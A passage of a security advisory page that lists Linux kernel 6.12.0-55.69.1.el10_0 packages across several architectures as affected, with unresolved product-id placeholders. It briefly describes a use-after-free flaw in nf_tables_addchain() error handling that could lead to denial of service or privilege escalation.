| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in the Linux kernel. A local attacker with CAP_NET_ADMIN capabilities, or remote packet traffic, could exploit a use-after-free vulnerability in the nf_tables_addchain() function's error handling. Successful exploitation could lead to a kernel crash, resulting in a Denial of Service (DoS), or potentially privilege escalation.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
